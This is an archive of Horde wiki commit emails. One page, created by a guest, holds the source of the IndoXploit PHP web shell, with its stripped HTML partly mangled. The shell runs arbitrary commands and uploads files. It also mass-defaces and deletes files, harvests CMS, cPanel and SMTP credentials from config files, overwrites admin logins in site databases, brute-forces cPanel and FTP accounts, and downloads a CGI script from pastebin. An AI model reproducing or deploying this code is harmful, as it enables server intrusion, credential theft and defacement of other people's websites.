From jan at horde.org Fri Sep 1 07:13:04 2017 From: jan at horde.org (Jan Schneider) Date: Fri, 01 Sep 2017 07:13:04 +0000 Subject: [commits] [Wiki] deleted: inurl:"admin/my_documents/my_files Message-ID: <20170901071304.Horde.cfozQHJkeuATM7UQsxmQG21@wiki.horde.org> jan Fri, 01 Sep 2017 07:13:04 +0000 Deleted page: inurl:"admin/my_documents/my_files From wikiguest at horde.org Sat Sep 2 13:54:23 2017 From: wikiguest at horde.org (Wiki Guest) Date: Sat, 02 Sep 2017 13:54:23 +0000 Subject: [commits] [Wiki] created: inurl:"admin/RTE_popup_file_atch.asp Message-ID: <20170902135423.Horde.YBfrhiCHxpV6zNWBUBz3Ggf@wiki.horde.org> guest [36.74.37.192] Sat, 02 Sep 2017 13:54:23 +0000 Created page: https://wiki.horde.org/inurl%3A%22admin/RTE_popup_file_atch.asp [[toc]] + Project Name Project summary and goal. Please include what the scope of the project is, what applications or libraries it touches, and what it is intended to accomplish at a minimum. ++ Bugs List any tickets on http://bugs.horde.org/ that cover this issue or are relevant to it. ++ People Who is or might be involved in this project? Who can answer questions about it, either about a specific technology (iCalendar) or about a specific part of Horde (Kronolith)? ++ Description Detailed project description. Include implementation steps, current status, plan, etc. ++ Resources Include links to protocol descriptions, specifications, RFCs, external applications, presentations on http://horde.org/papers/ or elsewhere that are relevant, articles, API docs from http://dev.horde.org/ - anything that might be useful to someone working on this. ---- Back to the ((Project|Project List)) From wikiguest at horde.org Sat Sep 2 19:07:49 2017 From: wikiguest at horde.org (Wiki Guest) Date: Sat, 02 Sep 2017 19:07:49 +0000 Subject: [commits] [Wiki] created: admin/RTE_popup_file_atch.asp Message-ID: <20170902190749.Horde.wEg-BN5E_kuqhluaxk-wpUO@wiki.horde.org> guest [105.103.94.116] Sat, 02 Sep 2017 19:07:49 +0000 Created page: https://wiki.horde.org/admin/RTE_popup_file_atch.asp IndoXploit
  ___________________________
< root at indoxploit:~# w00t??? >
  ---------------------------
    \         ,        ,
     \       /(        )`
      \      \ \___   / |
             /- _  `-/  '
            (/\/ \ \   /\
            / /   | `    \
            O O   ) /    |
            `-^--'`<     '
           (_.)  _  )   /
            `.___/`    /
              `-----' /
<----.     __ / __   \
<----|====O)))==) \) /====
<----'    `--' `.__,' \
              |        |
               \       /
         ______( (_  / \______
       ,'  ,-----'   |        \
       `--{__________)        \/

	
IndoXploit ".$perm.""; } else { return "".$perm.""; } } function r($dir,$perm) { if(!is_readable($dir)) { return "".$perm.""; } else { return "".$perm.""; } } function exe($cmd) { if(function_exists('system')) { @ob_start(); @system($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists('exec')) { @exec($cmd,$results); $buff = ""; foreach($results as $result) { $buff .= $result; } return $buff; } elseif(function_exists('passthru')) { @ob_start(); @passthru($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists('shell_exec')) { $buff = @shell_exec($cmd); return $buff; } } function perms($file){ $perms = fileperms($file); if (($perms & 0xC000) == 0xC000) { // Socket $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { // Symbolic Link $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { // Regular $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { // Block special $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { // Directory $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { // Character special $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { // FIFO pipe $info = 'p'; } else { // Unknown $info = 'u'; } // Owner $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); // Group $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); // World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } function hdd($s) { if($s >= 1073741824) return sprintf('%1.2f',$s / 1073741824 ).' GB'; elseif($s >= 1048576) return sprintf('%1.2f',$s / 1048576 ) .' MB'; elseif($s >= 1024) return sprintf('%1.2f',$s / 1024 ) .' KB'; else return $s .' B'; } function ambilKata($param, $kata1, $kata2){ if(strpos($param, $kata1) === FALSE) return FALSE; if(strpos($param, $kata2) === FALSE) return FALSE; $start = strpos($param, $kata1) + strlen($kata1); $end = strpos($param, $kata2, $start); $return = substr($param, $start, $end - $start); return $return; } function getsource($url) { $curl = curl_init($url); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false); $content = curl_exec($curl); curl_close($curl); return $content; } function bing($dork) { $npage = 1; $npages = 30000; $allLinks = array(); $lll = array(); while($npage <= $npages) { $x = getsource("http://www.bing.com/search?q=".$dork."&first=".$npage); if($x) { preg_match_all('#

ON" : "OFF"; $ds = @ini_get("disable_functions"); $mysql = (function_exists('mysql_connect')) ? "ON" : "OFF"; $curl = (function_exists('curl_version')) ? "ON" : "OFF"; $wget = (exe('wget --help')) ? "ON" : "OFF"; $perl = (exe('perl --help')) ? "ON" : "OFF"; $python = (exe('python --help')) ? "ON" : "OFF"; $show_ds = (!empty($ds)) ? "$ds" : "NONE"; if(!function_exists('posix_getegid')) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(posix_geteuid()); $gid = @posix_getgrgid(posix_getegid()); $user = $uid['name']; $uid = $uid['uid']; $group = $gid['name']; $gid = $gid['gid']; } echo "System: ".$kernel."
"; echo "User: ".$user." (".$uid.") Group: ".$group." (".$gid.")
"; echo "Server IP: ".$ip." | Your IP: ".$_SERVER['REMOTE_ADDR']."
"; echo "HDD: $used / $total ( Free: $freespace )
"; echo "Safe Mode: $sm
"; echo "Disable Functions: $show_ds
"; echo "MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl
"; echo "Current DIR: "; foreach($scdir as $c_dir => $cdir) { echo "
$cdir/"; } echo "  [ ".w($dir, perms($dir))." ]"; echo "
"; echo "
"; echo ""; echo "
"; echo "
"; if($_GET['logout'] == true) { unset($_SESSION[md5($_SERVER['HTTP_HOST'])]); echo ""; } elseif($_GET['do'] == 'upload') { echo "
"; if($_POST['upload']) { if($_POST['tipe_upload'] == 'biasa') { if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) { $act = "Uploaded! at $dir/".$_FILES['ix_file']['name'].""; } else { $act = "failed to upload file"; } } else { $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name']; $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name']; if(is_writable($_SERVER['DOCUMENT_ROOT'])) { if(@copy($_FILES['ix_file']['tmp_name'], $root)) { $act = "Uploaded! at $root -> $web"; } else { $act = "failed to upload file"; } } else { $act = "failed to upload file"; } } } echo "Upload File:
Biasa [ ".w($dir,"Writeable")." ] home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]
"; echo $act; echo "
"; } elseif($_GET['do'] == 'cmd') { echo "
".$user."@".$ip.": ~ $
"; if($_POST['do_cmd']) { echo "
".exe($_POST['cmd'])."
"; } } elseif($_GET['do'] == 'mass_deface') { function sabun_massal($dir,$namafile,$isi_script) { if(is_writable($dir)) { $dira = scandir($dir); foreach($dira as $dirb) { $dirc = "$dir/$dirb"; $lokasi = $dirc.'/'.$namafile; if($dirb === '.') { file_put_contents($lokasi, $isi_script); } elseif($dirb === '..') { file_put_contents($lokasi, $isi_script); } else { if(is_dir($dirc)) { if(is_writable($dirc)) { echo "[DONE] $lokasi
"; file_put_contents($lokasi, $isi_script); $idx = sabun_massal($dirc,$namafile,$isi_script); } } } } } } function sabun_biasa($dir,$namafile,$isi_script) { if(is_writable($dir)) { $dira = scandir($dir); foreach($dira as $dirb) { $dirc = "$dir/$dirb"; $lokasi = $dirc.'/'.$namafile; if($dirb === '.') { file_put_contents($lokasi, $isi_script); } elseif($dirb === '..') { file_put_contents($lokasi, $isi_script); } else { if(is_dir($dirc)) { if(is_writable($dirc)) { echo "[DONE] $dirb/$namafile
"; file_put_contents($lokasi, $isi_script); } } } } } } if($_POST['start']) { if($_POST['tipe_sabun'] == 'mahal') { echo "
"; sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']); echo "
"; } elseif($_POST['tipe_sabun'] == 'murah') { echo "
"; sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']); echo "
"; } } else { echo "
"; echo "
Tipe Sabun:
BiasaMassal
Folder:

Filename:

Index File:

"; } } elseif($_GET['do'] == 'mass_delete') { function hapus_massal($dir,$namafile) { if(is_writable($dir)) { $dira = scandir($dir); foreach($dira as $dirb) { $dirc = "$dir/$dirb"; $lokasi = $dirc.'/'.$namafile; if($dirb === '.') { if(file_exists("$dir/$namafile")) { unlink("$dir/$namafile"); } } elseif($dirb === '..') { if(file_exists("".dirname($dir)."/$namafile")) { unlink("".dirname($dir)."/$namafile"); } } else { if(is_dir($dirc)) { if(is_writable($dirc)) { if(file_exists($lokasi)) { echo "[DELETED] $lokasi
"; unlink($lokasi); $idx = hapus_massal($dirc,$namafile); } } } } } } } if($_POST['start']) { echo "
"; hapus_massal($_POST['d_dir'], $_POST['d_file']); echo "
"; } else { echo "
"; echo "
Folder:

Filename:

"; } } elseif($_GET['do'] == 'config') { $etc = fopen("/etc/passwd", "r") or die("
Can't  
read /etc/passwd
"); $idx = mkdir("idx_config", 0777); $isi_htc = "Options all\nRequire None\nSatisfy Any"; $htc = fopen("idx_config/.htaccess","w"); fwrite($htc, $isi_htc); while($passwd = fgets($etc)) { if($passwd == "" || !$etc) { echo "Can't read /etc/passwd"; } else { preg_match_all('/(.*?):x:/', $passwd, $user_config); foreach($user_config[1] as $user_idx) { $user_config_dir = "/home/$user_idx/public_html/"; if(is_readable($user_config_dir)) { $grab_config = array( "/home/$user_idx/.my.cnf" => "cpanel", "/home/$user_idx/.accesshash" => "WHM-accesshash", "/home/$user_idx/public_html/po-content/config.php" => "Popoji", "/home/$user_idx/public_html/vdo_config.php" => "Voodoo", "/home/$user_idx/public_html/bw-configs/config.ini" => "BosWeb", "/home/$user_idx/public_html/config/koneksi.php" => "Lokomedia", "/home/$user_idx/public_html/lokomedia/config/koneksi.php" => "Lokomedia", "/home/$user_idx/public_html/clientarea/configuration.php" => "WHMCS", "/home/$user_idx/public_html/whm/configuration.php" => "WHMCS", "/home/$user_idx/public_html/whmcs/configuration.php" => "WHMCS", "/home/$user_idx/public_html/forum/config.php" => "phpBB", "/home/$user_idx/public_html/sites/default/settings.php" => "Drupal", "/home/$user_idx/public_html/config/settings.inc.php" => "PrestaShop", "/home/$user_idx/public_html/app/etc/local.xml" => "Magento", "/home/$user_idx/public_html/joomla/configuration.php" => "Joomla", "/home/$user_idx/public_html/configuration.php" => "Joomla", "/home/$user_idx/public_html/wp/wp-config.php" => "WordPress", "/home/$user_idx/public_html/wordpress/wp-config.php" => "WordPress", "/home/$user_idx/public_html/wp-config.php" => "WordPress", "/home/$user_idx/public_html/admin/config.php" => "OpenCart", "/home/$user_idx/public_html/slconfig.php" => "Sitelok", "/home/$user_idx/public_html/application/config/database.php" => "Ellislab"); foreach($grab_config as $config => $nama_config) { $ambil_config = file_get_contents($config); if($ambil_config == '') { } else { $file_config = fopen("idx_config/$user_idx-$nama_config.txt","w"); fputs($file_config,$ambil_config); } } } } } } echo "
Done
"; } elseif($_GET['do'] == 'jumping') { $i = 0; echo "
"; if(preg_match("/hsphere/", $dir)) { $urls = explode("\r\n", $_POST['url']); if(isset($_POST['jump'])) { echo "
";
			foreach($urls as $url) {
				$url = str_replace(array("http://","www."), "", strtolower($url));
				$etc = "/etc/passwd";
				$f = fopen($etc,"r");
				while($gets = fgets($f)) {
					$pecah = explode(":", $gets);
					$user = $pecah[0];
					$dir_user = "/hsphere/local/home/$user";
					if(is_dir($dir_user) === true) {
						$url_user = $dir_user."/".$url;
						if(is_readable($url_user)) {
							$i++;
							$jrw = "[R] $url_user";
							if(is_writable($url_user)) {
								$jrw = "[RW] $url_user";
							}
							echo $jrw."
"; } } } } if($i == 0) { } else { echo "
Total ada ".$i." Kamar di ".$ip; } echo "
"; } else { echo '
List Domains:

'; } } elseif(preg_match("/vhosts/", $dir)) { $urls = explode("\r\n", $_POST['url']); if(isset($_POST['jump'])) { echo "
";
			foreach($urls as $url) {
				$web_vh = "/var/www/vhosts/$url/httpdocs";
				if(is_dir($web_vh) === true) {
					if(is_readable($web_vh)) {
						$i++;
						$jrw = "[R] $web_vh";
						if(is_writable($web_vh)) {
							$jrw = "[RW] $web_vh";
						}
						echo $jrw."
"; } } } if($i == 0) { } else { echo "
Total ada ".$i." Kamar di ".$ip; } echo "
"; } else { echo '
List Domains:

'; } } else { echo "
";
		$etc = fopen("/etc/passwd", "r") or die("Can't read  
/etc/passwd");
		while($passwd = fgets($etc)) {
			if($passwd == '' || !$etc) {
				echo "Can't read /etc/passwd";
			} else {
				preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
				foreach($user_jumping[1] as $user_idx_jump) {
					$user_jumping_dir = "/home/$user_idx_jump/public_html";
					if(is_readable($user_jumping_dir)) {
						$i++;
						$jrw = "[R] $user_jumping_dir";
						if(is_writable($user_jumping_dir)) {
							$jrw = "[RW] $user_jumping_dir";
						}
						echo $jrw;
						if(function_exists('posix_getpwuid')) {
							$domain_jump = file_get_contents("/etc/named.conf");
							if($domain_jump == '') {
								echo " => ( gabisa ambil nama domain  
nya )
"; } else { preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump); foreach($domains_jump[1] as $dj) { $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj")); $user_jumping_url = $user_jumping_url['name']; if($user_jumping_url == $user_idx_jump) { echo " => ( $dj )
"; break; } } } } else { echo "
"; } } } } } if($i == 0) { } else { echo "
Total ada ".$i." Kamar di ".$ip; } echo "
"; } echo "
"; } elseif($_GET['do'] == 'auto_edit_user') { if($_POST['hajar']) { if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) { echo "username atau password harus lebih dari 6 karakter"; } else { $user_baru = $_POST['user_baru']; $pass_baru = md5($_POST['pass_baru']); $conf = $_POST['config_dir']; $scan_conf = scandir($conf); foreach($scan_conf as $file_conf) { if(!is_file("$conf/$file_conf")) continue; $config = file_get_contents("$conf/$file_conf"); if(preg_match("/JConfig|joomla/",$config)) { $dbhost = ambilkata($config,"host = '","'"); $dbuser = ambilkata($config,"user = '","'"); $dbpass = ambilkata($config,"password = '","'"); $dbname = ambilkata($config,"db = '","'"); $dbprefix = ambilkata($config,"dbprefix = '","'"); $prefix = $dbprefix."users"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC"); $result = mysql_fetch_array($q); $id = $result['id']; $site = ambilkata($config,"sitename = '","'"); $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'"); echo "Config => ".$file_conf."
"; echo "CMS => Joomla
"; if($site == '') { echo "Sitename => error, gabisa ambil nama domain nya
"; } else { echo "Sitename => $site
"; } if(!$update OR !$conn OR !$db) { echo "Status => ".mysql_error()."

"; } else { echo "Status => sukses edit user, silakan login dengan user & pass yang baru.

"; } mysql_close($conn); } elseif(preg_match("/WordPress/",$config)) { $dbhost = ambilkata($config,"DB_HOST', '","'"); $dbuser = ambilkata($config,"DB_USER', '","'"); $dbpass = ambilkata($config,"DB_PASSWORD', '","'"); $dbname = ambilkata($config,"DB_NAME', '","'"); $dbprefix = ambilkata($config,"table_prefix = '","'"); $prefix = $dbprefix."users"; $option = $dbprefix."options"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC"); $result = mysql_fetch_array($q); $id = $result[ID]; $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC"); $result2 = mysql_fetch_array($q2); $target = $result2[option_value]; if($target == '') { $url_target = "Login => error, gabisa ambil nama domain nyaa
"; } else { $url_target = "Login => $target/wp-login.php
"; } $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'"); echo "Config => ".$file_conf."
"; echo "CMS => Wordpress
"; echo $url_target; if(!$update OR !$conn OR !$db) { echo "Status => ".mysql_error()."

"; } else { echo "Status => sukses edit user, silakan login dengan user & pass yang baru.

"; } mysql_close($conn); } elseif(preg_match("/Magento|Mage_Core/",$config)) { $dbhost = ambilkata($config,""); $dbuser = ambilkata($config,""); $dbpass = ambilkata($config,""); $dbname = ambilkata($config,""); $dbprefix = ambilkata($config,""); $prefix = $dbprefix."admin_user"; $option = $dbprefix."core_config_data"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC"); $result = mysql_fetch_array($q); $id = $result[user_id]; $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'"); $result2 = mysql_fetch_array($q2); $target = $result2[value]; if($target == '') { $url_target = "Login => error, gabisa ambil nama domain nyaa
"; } else { $url_target = "Login => $target/admin/
"; } $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'"); echo "Config => ".$file_conf."
"; echo "CMS => Magento
"; echo $url_target; if(!$update OR !$conn OR !$db) { echo "Status => ".mysql_error()."

"; } else { echo "Status => sukses edit user, silakan login dengan user & pass yang baru.

"; } mysql_close($conn); } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) { $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'"); $dbuser = ambilkata($config,"'DB_USERNAME', '","'"); $dbpass = ambilkata($config,"'DB_PASSWORD', '","'"); $dbname = ambilkata($config,"'DB_DATABASE', '","'"); $dbprefix = ambilkata($config,"'DB_PREFIX', '","'"); $prefix = $dbprefix."user"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC"); $result = mysql_fetch_array($q); $id = $result[user_id]; $target = ambilkata($config,"HTTP_SERVER', '","'"); if($target == '') { $url_target = "Login => error, gabisa ambil nama domain nyaa
"; } else { $url_target = "Login => $target
"; } $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'"); echo "Config => ".$file_conf."
"; echo "CMS => OpenCart
"; echo $url_target; if(!$update OR !$conn OR !$db) { echo "Status => ".mysql_error()."

"; } else { echo "Status => sukses edit user, silakan login dengan user & pass yang baru.

"; } mysql_close($conn); } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) { $dbhost = ambilkata($config,'server = "','"'); $dbuser = ambilkata($config,'username = "','"'); $dbpass = ambilkata($config,'password = "','"'); $dbname = ambilkata($config,'database = "','"'); $prefix = "users"; $option = "identitas"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC"); $result = mysql_fetch_array($q); $target = $result[alamat_website]; if($target == '') { $target2 = $result[url]; $url_target = "Login => error, gabisa ambil nama domain nyaa
"; if($target2 == '') { $url_target2 = "Login => error, gabisa ambil nama domain nyaa
"; } else { $cek_login3 = file_get_contents("$target2/adminweb/"); $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/"); if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) { $url_target2 = "Login => $target2/adminweb
"; } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) { $url_target2 = "Login => $target2/lokomedia/adminweb
"; } else { $url_target2 = "Login => $target2 [ gatau admin login nya dimana :p ]
"; } } } else { $cek_login = file_get_contents("$target/adminweb/"); $cek_login2 = file_get_contents("$target/lokomedia/adminweb/"); if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) { $url_target = "Login => $target/adminweb
"; } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) { $url_target = "Login => $target/lokomedia/adminweb
"; } else { $url_target = "Login => $target [ gatau admin login nya dimana :p ]
"; } } $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'"); echo "Config => ".$file_conf."
"; echo "CMS => Lokomedia
"; if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) { echo $url_target2; } else { echo $url_target; } if(!$update OR !$conn OR !$db) { echo "Status => ".mysql_error()."

"; } else { echo "Status => sukses edit user, silakan login dengan user & pass yang baru.

"; } mysql_close($conn); } } } } else { echo "

Auto Edit User Config

DIR Config:


Set User & Pass:


NB: Tools ini work jika dijalankan di dalam folder config ( ex: /home/user/public_html/nama_folder_config )
"; } } elseif($_GET['do'] == 'cpanel') { if($_POST['crack']) { $usercp = explode("\r\n", $_POST['user_cp']); $passcp = explode("\r\n", $_POST['pass_cp']); $i = 0; foreach($usercp as $ucp) { foreach($passcp as $pcp) { if(@mysql_connect('localhost', $ucp, $pcp)) { if($_SESSION[$ucp] && $_SESSION[$pcp]) { } else { $_SESSION[$ucp] = "1"; $_SESSION[$pcp] = "1"; if($ucp == '' || $pcp == '') { } else { $i++; if(function_exists('posix_getpwuid')) { $domain_cp = file_get_contents("/etc/named.conf"); if($domain_cp == '') { $dom = "gabisa ambil nama domain nya"; } else { preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp); foreach($domains_cp[1] as $dj) { $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj")); $user_cp_url = $user_cp_url['name']; if($user_cp_url == $ucp) { $dom = "$dj"; break; } } } } else { $dom = "function is Disable by system"; } echo "username ($ucp) password ($pcp) domain ($dom)
"; } } } } } if($i == 0) { } else { echo "
sukses nyolong ".$i." Cpanel by IndoXploit."; } } else { echo "
USER:

PASS:

NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder config ( ex: /home/user/public_html/nama_folder_config )
"; } } elseif($_GET['do'] == 'cpftp_auto') { if($_POST['crack']) { $usercp = explode("\r\n", $_POST['user_cp']); $passcp = explode("\r\n", $_POST['pass_cp']); $i = 0; foreach($usercp as $ucp) { foreach($passcp as $pcp) { if(@mysql_connect('localhost', $ucp, $pcp)) { if($_SESSION[$ucp] && $_SESSION[$pcp]) { } else { $_SESSION[$ucp] = "1"; $_SESSION[$pcp] = "1"; if($ucp == '' || $pcp == '') { // } else { echo "[+] username ($ucp) password ($pcp)
"; $ftp_conn = ftp_connect($ip); $ftp_login = ftp_login($ftp_conn, $ucp, $pcp); if((!$ftp_login) || (!$ftp_conn)) { echo "[+] Login Gagal

"; } else { echo "[+] Login Sukses
"; $fi = htmlspecialchars($_POST['file_deface']); $deface = ftp_put($ftp_conn, "public_html/$fi", $_POST['deface'], FTP_BINARY); if($deface) { $i++; echo "[+] Deface Sukses
"; if(function_exists('posix_getpwuid')) { $domain_cp = file_get_contents("/etc/named.conf"); if($domain_cp == '') { echo "[+] gabisa ambil nama domain nya

"; } else { preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp); foreach($domains_cp[1] as $dj) { $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj")); $user_cp_url = $user_cp_url['name']; if($user_cp_url == $ucp) { echo "[+] http://$dj/$fi

"; break; } } } } else { echo "[+] gabisa ambil nama domain nya

"; } } else { echo "[-] Deface Gagal

"; } } //echo "username ($ucp) password ($pcp)
"; } } } } } if($i == 0) { } else { echo "
sukses deface ".$i." Cpanel by IndoXploit."; } } else { echo "
Filename:

Deface Page:

USER:

PASS:

NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder config ( ex: /home/user/public_html/nama_folder_config )
"; } } elseif($_GET['do'] == 'smtp') { echo "
NB: Tools ini work jika dijalankan di dalam folder config ( ex: /home/user/public_html/nama_folder_config )

"; function scj($dir) { $dira = scandir($dir); foreach($dira as $dirb) { if(!is_file("$dir/$dirb")) continue; $ambil = file_get_contents("$dir/$dirb"); $ambil = str_replace("$", "", $ambil); if(preg_match("/JConfig|joomla/", $ambil)) { $smtp_host = ambilkata($ambil,"smtphost = '","'"); $smtp_auth = ambilkata($ambil,"smtpauth = '","'"); $smtp_user = ambilkata($ambil,"smtpuser = '","'"); $smtp_pass = ambilkata($ambil,"smtppass = '","'"); $smtp_port = ambilkata($ambil,"smtpport = '","'"); $smtp_secure = ambilkata($ambil,"smtpsecure = '","'"); echo "SMTP Host: $smtp_host
"; echo "SMTP port: $smtp_port
"; echo "SMTP user: $smtp_user
"; echo "SMTP pass: $smtp_pass
"; echo "SMTP auth: $smtp_auth
"; echo "SMTP secure: $smtp_secure

"; } } } $smpt_hunter = scj($dir); echo $smpt_hunter; } elseif($_GET['do'] == 'auto_wp') { if($_POST['hajar']) { $title = htmlspecialchars($_POST['new_title']); $pn_title = str_replace(" ", "-", $title); if($_POST['cek_edit'] == "Y") { $script = $_POST['edit_content']; } else { $script = $title; } $conf = $_POST['config_dir']; $scan_conf = scandir($conf); foreach($scan_conf as $file_conf) { if(!is_file("$conf/$file_conf")) continue; $config = file_get_contents("$conf/$file_conf"); if(preg_match("/WordPress/", $config)) { $dbhost = ambilkata($config,"DB_HOST', '","'"); $dbuser = ambilkata($config,"DB_USER', '","'"); $dbpass = ambilkata($config,"DB_PASSWORD', '","'"); $dbname = ambilkata($config,"DB_NAME', '","'"); $dbprefix = ambilkata($config,"table_prefix = '","'"); $prefix = $dbprefix."posts"; $option = $dbprefix."options"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC"); $result = mysql_fetch_array($q); $id = $result[ID]; $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC"); $result2 = mysql_fetch_array($q2); $target = $result2[option_value]; $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'"); $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'"); echo "
"; if($target == '') { echo "URL: error, gabisa ambil nama domain nya -> "; } else { echo "URL: $target/?p=$id -> "; } if(!$update OR !$conn OR !$db) { echo "MySQL Error: ".mysql_error()."
"; } else { echo "sukses di ganti.
"; } echo "
"; mysql_close($conn); } } } else { echo "

Auto Edit Title+Content WordPress

DIR Config:


Set Title:


Edit Content?: YN
Jika pilih Y masukin script defacemu ( saran yang simple aja ), kalo pilih N gausah di isi.


NB: Tools ini work jika dijalankan di dalam folder config ( ex: /home/user/public_html/nama_folder_config )
"; } } elseif($_GET['do'] == 'zoneh') { if($_POST['submit']) { $domain = explode("\r\n", $_POST['url']); $nick = $_POST['nick']; echo "Defacer Onhold: http://www.zone-h.org/archive/notifier=$nick/published=0
"; echo "Defacer Archive: http://www.zone-h.org/archive/notifier=$nick

"; function zoneh($url,$nick) { $ch = curl_init("http://www.zone-h.com/notify/single"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send"); return curl_exec($ch); curl_close($ch); } foreach($domain as $url) { $zoneh = zoneh($url,$nick); if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) { echo "$url -> OK
"; } else { echo "$url -> ERROR
"; } } } else { echo "
Defacer:

Domains:

"; } echo "
"; } elseif($_GET['do'] == 'cgi') { $cgi_dir = mkdir('idx_cgi', 0755); $file_cgi = "idx_cgi/cgi.izo"; $isi_htcgi = "AddHandler cgi-script .izo"; $htcgi = fopen(".htaccess", "w"); $cgi_script = file_get_contents("http://pastebin.com/raw.php?i=XTUFfJLg"); $cgi = fopen($file_cgi, "w"); fwrite($cgi, $cgi_script); fwrite($htcgi, $isi_htcgi); chmod($file_cgi, 0755); echo ""; } elseif($_GET['do'] == 'fake_root') { ob_start(); $cwd = getcwd(); $ambil_user = explode("/", $cwd); $user = $ambil_user[2]; if($_POST['reverse']) { $site = explode("\r\n", $_POST['url']); $file = $_POST['file']; foreach($site as $url) { $cek = getsource("$url/~$user/$file"); if(preg_match("/hacked/i", $cek)) { echo "URL: $url/~$user/$file -> Fake Root!
"; } } } else { echo "
Filename:

User:

Domain:


NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.
"; } } elseif($_GET['do'] == 'adminer') { $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir); function adminer($url, $isi) { $fp = fopen($isi, "w"); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_BINARYTRANSFER, true); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_FILE, $fp); return curl_exec($ch); curl_close($ch); fclose($fp); ob_flush(); flush(); } if(file_exists('adminer.php')) { echo "
-> adminer login <-
